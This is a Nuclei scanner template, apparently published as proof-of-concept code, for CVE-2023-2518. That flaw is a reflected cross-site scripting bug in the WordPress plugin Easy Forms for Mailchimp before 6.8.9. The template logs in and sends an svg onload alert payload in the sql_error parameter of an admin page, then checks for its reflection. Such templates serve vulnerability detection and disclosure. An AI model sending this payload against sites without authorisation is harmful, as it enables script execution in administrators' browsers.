The Easy Forms for Mailchimp plugin before version 6.8.9 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the sql_error parameter before outputting it back in the page when the debug option is enabled, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
PoC代码[已公开]
id: CVE-2023-2518
info:
name: WordPress Easy Forms for Mailchimp Plugin < 6.8.9 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
The Easy Forms for Mailchimp plugin before version 6.8.9 contains a reflected cross-site scripting vulnerability. The plugin does not properly sanitize and escape the sql_error parameter before outputting it back in the page when the debug option is enabled, which could allow attackers to execute arbitrary JavaScript code in an administrator's browser context.
reference:
- https://wpscan.com/vulnerability/ca120255-2c50-4906-97f3-ea660486db4c
- https://nvd.nist.gov/vuln/detail/CVE-2023-2518
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-2518
cwe-id: CWE-79
epss-score: 0.12549
epss-percentile: 0.93713
cpe: cpe:2.3:a:yikesinc:easy_forms_for_mailchimp:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 3
vendor: yikesinc
product: easy_forms_for_mailchimp
fofa-query: body="wp-content/plugins/yikes-inc-easy-mailchimp-extender/"
tags: cve,cve2023,wp,wordpress,wp-plugin,xss,yikes-inc-easy-mailchimp-extender,authenticated
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
matchers:
- type: word
part: body
words:
- "yikes-inc-easy-mailchimp-extender"
internal: true
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=yikes-mailchimp-edit-form&sql_error=%3Csvg%2Fonload%3Dalert%28document.domain%29%3E HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<svg/onload=alert(document.domain)>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a0046304402202b30e9ad8c63eb5ec6c97f7e72ce11ee65c7cb901a0602203d86d5a025c8de4402200e1ded66098016b2a8ea79714f72445aa3c24058140c4ef111e3c898745551ed:922c64590222798bb761d5b6d8e72950